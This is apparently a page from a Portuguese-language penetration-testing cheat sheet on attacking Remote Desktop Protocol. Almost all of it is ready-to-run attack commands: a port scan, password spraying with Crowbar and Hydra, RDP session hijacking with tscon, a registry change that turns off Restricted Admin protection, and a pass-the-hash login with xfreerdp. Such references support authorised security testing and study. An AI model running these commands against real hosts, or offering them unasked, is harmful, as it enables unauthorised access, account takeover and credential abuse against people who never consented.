RDP

é um protocolo proprietário desenvolvido pela Microsoft que fornece ao usuário uma interface gráfica para se conectar a outro computador por meio de uma conexão de rede. Por padrão, o RDP usa a porta TCP/3389.

Nmap

nmap -Pn -p3389 192.168.2.143

Crowbar - Pulverização de senha RDP

crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'

Hydra - Pulverização de senha RDP

hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

Login RDP

rdesktop -u admin -p password123 192.168.2.143

Representar um usuário sem sua senha.

tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}

Execute o sequestro de sessão RDP.

net start sessionhijack

Habilite o "Modo de Administração Restrito" no host Windows de destino.

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Use a técnica Pass-The-Hash para efetuar login no host de destino sem uma senha.

xfreerdp /v:192.168.2.141 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA

PreviousSQL Databases NextDNS

Last updated 8 months ago